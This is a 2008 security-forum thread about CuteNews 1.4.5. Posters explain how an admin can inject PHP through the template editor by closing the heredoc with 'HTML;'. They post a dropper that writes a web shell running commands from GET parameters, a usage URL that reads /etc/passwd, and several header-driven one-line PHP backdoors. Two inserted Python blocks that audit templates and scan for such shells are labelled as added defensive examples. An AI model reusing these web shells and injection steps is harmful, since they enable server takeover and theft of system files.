IT Security and Insecurity Portal

Cutenews 1.4.5

Posted: Fri Feb 01, 2008 9:22 pm
tintin
Beginner
Joined: Feb 01, 2008
Posts: 4
Location: UK

Is there any way to get config.php via control panel?
Thanks.

Re: Cutenews 1.4.5

Posted: Fri Feb 01, 2008 10:00 pm
waraxe
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu

tintin wrote: | Is there any way to get config.php via control panel?
Thanks. |
Get admin level, edit templates and inject php code, from there you can read/write any files, execute shell commands, etc ...

Posted: Fri Feb 01, 2008 10:49 pm
tintin
Beginner
Joined: Feb 01, 2008
Posts: 4
Location: UK

Yeah, I got admin access level, but what is the code? It's my first time; I'm trying to learn.

Posted: Sat Feb 02, 2008 9:44 pm
givi
Beginner
Joined: Feb 02, 2008
Posts: 2

Hi, I've got admin access too, and try to edit templates. But it does not work! For example, after inserting code like this:
Code: | <?php echo 'Hello'; ?> |
it doesn't work properly, but when I insert this:
Code: | <?php echo '<p>Hello</p>'; ?> |
it prints a message, so I think template editing doesn't help here, because the code does not work. Maybe I'm wrong; please show me how it must be done!
P.S. Sorry for my English.

Posted: Sat Feb 02, 2008 9:56 pm
waraxe
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu

You need to manipulate templates in the proper way.
Go to the template editor, select the default template and let it be the part "Active News".
Insert these 2 lines at the end:
HTML;
phpinfo();
Save and then try to edit the template again ... you should see phpinfo output.
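
From the defender's side, the behaviour described in this thread means a CuteNews template file is parsed as PHP, so an integrity check can flag any statement that sits outside a template body. The following is an added example, not part of the original thread or of CuteNews itself; the `$template_* = <<<HTML` layout, the function names and the sample template are assumptions constructed for illustration.

```python
import re

# Assumed layout of a CuteNews 1.4.x template file (data/*.tpl): a PHP file in
# which every section is a heredoc:  $template_active = <<<HTML ... HTML;
OPEN_RE = re.compile(r'^\$template_\w+\s*=\s*<<<\s*HTML\s*$')
CLOSE_RE = re.compile(r'^HTML;\s*$')
# Outside a body only blank lines, PHP tags and plain comments are expected.
# Comments containing '?' or '<' are not whitelisted, since '?>' ends a comment.
HARMLESS_RE = re.compile(r'^\s*(<\?php|\?>|(//|#)[^?<]*)?\s*$', re.IGNORECASE)


def audit_template(text):
    """Return (line_no, line) for every statement found outside a heredoc body."""
    findings, in_body = [], False
    for no, line in enumerate(text.splitlines(), 1):
        if in_body:
            in_body = not CLOSE_RE.match(line)
        elif OPEN_RE.match(line):
            in_body = True
        elif not HARMLESS_RE.match(line):
            findings.append((no, line.strip()))
    return findings


def body_is_safe(body):
    """Save-time check: refuse a body with a line that would end the heredoc."""
    return not any(re.match(r'^\s*HTML\b', ln) for ln in body.splitlines())


# Constructed sample: a clean template, and the same file after the edit
# described in the thread (terminator plus a statement appended to a section).
CLEAN = """<?PHP
///////////////////// TEMPLATE Default /////////////////////
$template_active = <<<HTML
<div><b>{title}</b> {short-story}</div>
HTML;

$template_full = <<<HTML
<div>{full-story}</div>
HTML;
?>
"""
TAMPERED = CLEAN.replace("{short-story}</div>\n",
                         "{short-story}</div>\nHTML;\nphpinfo();\n", 1)

if __name__ == "__main__":
    for name, text in (("clean", CLEAN), ("tampered", TAMPERED)):
        print(name, audit_template(text))
```

The audit only detects the change after the fact; the durable fix is to stop storing admin-editable templates in a file the PHP interpreter parses.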

Posted: Sat Feb 02, 2008 10:48 pm
givi
Beginner
Joined: Feb 02, 2008
Posts: 2

Oh, thank you! All works fine, thanks once more.

Posted: Sun Aug 17, 2008 4:28 pm
xxxmystikxxx
Regular user
Joined: Aug 17, 2008
Posts: 8
Location: C:/Lineage2/system/l2.exe

waraxe wrote: | You need to manipulate templates in the proper way.
Go to the template editor, select the default template and let it be the part "Active News".
Insert these 2 lines at the end:
HTML;
phpinfo();
Save and then try to edit the template again ... you should see phpinfo output. |
I did it and saw phpinfo, but what must I do to see config.php? What code must I insert?

Posted: Sun Aug 17, 2008 5:58 pm
pexli
Valuable expert
Joined: May 24, 2007
Posts: 665
Location: Bulgaria

xxxmystikxxx wrote: | waraxe wrote: | You need to manipulate templates in the proper way.
Go to the template editor, select the default template and let it be the part "Active News".
Insert these 2 lines at the end:
HTML;
phpinfo();
Save and then try to edit the template again ... you should see phpinfo output. |
I did it and saw phpinfo, but what must I do to see config.php? What code must I insert? |
You need to insert a shell and work via it.

Posted: Sun Aug 17, 2008 6:56 pm
xxxmystikxxx
Regular user
Joined: Aug 17, 2008
Posts: 8
Location: C:/Lineage2/system/l2.exe

But how do I insert a shell? And what shell is needed?

Posted: Mon Aug 18, 2008 4:37 pm
xxxmystikxxx
Regular user
Joined: Aug 17, 2008
Posts: 8
Location: C:/Lineage2/system/l2.exe

Can anybody help with inserting a shell? Write a manual please, or give advice.

Posted: Mon Aug 18, 2008 7:45 pm
pexli
Valuable expert
Joined: May 24, 2007
Posts: 665
Location: Bulgaria

Basic knowledge of PHP, Unix servers, etc.? I think you don't have any of this. Every guy who gets access to some admin panel is trying to destroy every server without any basic knowledge. You guys don't have any desire to learn how all this works. This here is not a kindergarten.

Posted: Mon Aug 18, 2008 10:36 pm
lenny
Valuable expert
Joined: May 15, 2008
Posts: 275

I agree, Koko. This is a security community, not for script kiddies.
But anyway, I won't judge you (mystik, givi or tintin... whoever you are) just for asking, so I will try and help.
Basically, you have permission to execute any PHP you desire. This means that with the help of a php shell such as the c99 shell or a custom shell.
I suggest you try this:
Quote: | <?php
$file = "<?php if ($_GET['type'] == 'passthru') {
echo passthru($_GET['cmd']); }
elseif ($_GET['type'] == 'exec') { exec($_GET['cmd']); }
elseif ($_GET['type'] == 'eval') { eval($_GET['cmd']); }
?>";
$targfile = "shell.php";
$filehandle = fopen($targfile , 'w');
fwrite($filehandle , $file);
fclose($filehandle );
?>
|
That should create a shell in its own file. Next, navigate to shell.php and give parameters:
shell.php?type=exec&cmd=cat /etc/passwd
Now, that is the very basics of shell usage... I'm not even sure if it will work - I am *very* tired!
The shell I used in this example is the one I always tend to use on my own servers occasionally.
I can have a closer look if you would like, just PM me the URL
Tell us when you try it

Posted: Tue Aug 19, 2008 4:54 am
pexli
Valuable expert
Joined: May 24, 2007
Posts: 665
Location: Bulgaria

lenny, if the admin of this server is not stupid he will find this shell after 5 min.

Posted: Tue Aug 19, 2008 8:46 am
xxxmystikxxx
Regular user
Joined: Aug 17, 2008
Posts: 8
Location: C:/Lineage2/system/l2.exe

lenny wrote: | I agree, Koko. This is a security community, not for script kiddies.
But anyway, I won't judge you (mystik, givi or tintin... whoever you are) just for asking, so I will try and help.
Basically, you have permission to execute any PHP you desire. This means that with the help of a php shell such as the c99 shell or a custom shell.
I suggest you try this:
Quote: | <?php
$file = "<?php if ($_GET['type'] == 'passthru') {
echo passthru($_GET['cmd']); }
elseif ($_GET['type'] == 'exec') { exec($_GET['cmd']); }
elseif ($_GET['type'] == 'eval') { eval($_GET['cmd']); }
?>";
$targfile = "shell.php";
$filehandle = fopen($targfile , 'w');
fwrite($filehandle , $file);
fclose($filehandle );
?>
|
That should create a shell in its own file. Next, navigate to shell.php and give parameters:
shell.php?type=exec&cmd=cat /etc/passwd
Now, that is the very basics of shell usage... I'm not even sure if it will work - I am *very* tired!
The shell I used in this example is the one I always tend to use on my own servers occasionally.
I can have a closer look if you would like, just PM me the URL
Tell us when you try it |
Parse error: syntax error, unexpected T_VARIABLE in C:\AppServ\www\news\data\Default.tpl on line 15
What did I do wrong?

Posted: Tue Aug 19, 2008 3:47 pm
pexli
Valuable expert
Joined: May 24, 2007
Posts: 665
Location: Bulgaria

<? @passthru('cmd'); ?>
Working with method POST. Try to find on Google or here what the difference is between the POST and GET methods.
...or this shell. WORKING WITH HEADERS.
<?php @passthru(@getenv("HTTP_YOURFUCKINGWORD"));exit;?>
in headers
YOURFUCKINGWORD:ls -la
...same shit
<?php $VR=@getenv('HTTP_VR');
if(strstr($VR,'V|R')=='V|R'){echo `$VR`;} ?>
headers
VR:ls -la
....same lamer's shell
<? if (@getenv(HTTP_koko)) {@passthru(@getenv(HTTP_koko));} else{phpinfo();} ?>
headers
koko:ls -la
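
The one-line shells posted in this thread share a recognisable shape: request-controlled data (a query parameter, or an `HTTP_*` header read with `getenv`) handed straight to an execution call or the backtick operator. As an added example that is not part of the original thread, this Python scanner flags that shape in PHP source; the sample lines, header names and function names are constructed for illustration.

```python
import re

SINK = r'(?:passthru|shell_exec|exec|system|popen|proc_open|eval)'
SOURCE = r'''(?:\$_(?:GET|POST|REQUEST|COOKIE|SERVER)\b|getenv\s*\(\s*['"]?HTTP_)'''
# A sink whose argument list contains request data before the statement ends.
DIRECT = re.compile(r'\b' + SINK + r'\s*\([^;]*?' + SOURCE, re.I)
# A variable assigned directly from request data (optionally with '@').
ASSIGN = re.compile(r'\$(\w+)\s*=\s*@?\s*' + SOURCE, re.I)
BACKTICK = re.compile(r'`([^`]*)`')


def scan_php(source):
    """Return sorted (line_no, reason) findings for one PHP source string."""
    findings, tainted = set(), set()
    for no, line in enumerate(source.splitlines(), 1):
        tainted.update(m.group(1) for m in ASSIGN.finditer(line))
        if DIRECT.search(line):
            findings.add((no, "request data passed straight to an execution call"))
        for var in tainted:
            ref = re.escape("$" + var) + r'\b'
            if any(re.search(ref, cmd) for cmd in BACKTICK.findall(line)):
                findings.add((no, "tainted variable inside backtick operator"))
            if re.search(r'\b' + SINK + r'\s*\([^;]*?' + ref, line, re.I):
                findings.add((no, "tainted variable passed to an execution call"))
    return sorted(findings)


# Constructed sample: three lines shaped like the shells in the thread,
# followed by two benign lines that must not be reported.
SAMPLE = """<?php @passthru(@getenv("HTTP_X_DEMO")); exit; ?>
<?php $v = @getenv('HTTP_V'); if (strstr($v, 'V|R') == 'V|R') { echo `$v`; } ?>
<?php if (@getenv(HTTP_demo)) { @passthru(@getenv(HTTP_demo)); } ?>
<?php $page = intval($_GET['page']); echo htmlspecialchars($title); ?>
<?php exec('ls -la /var/backups'); ?>
"""

if __name__ == "__main__":
    for line_no, reason in scan_php(SAMPLE):
        print(line_no, reason)
```

Taint tracking here is per file and line-based, so it is a triage aid for a web root, not a replacement for file-integrity monitoring of the application directory.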
All times are GMT
Page 1 of 2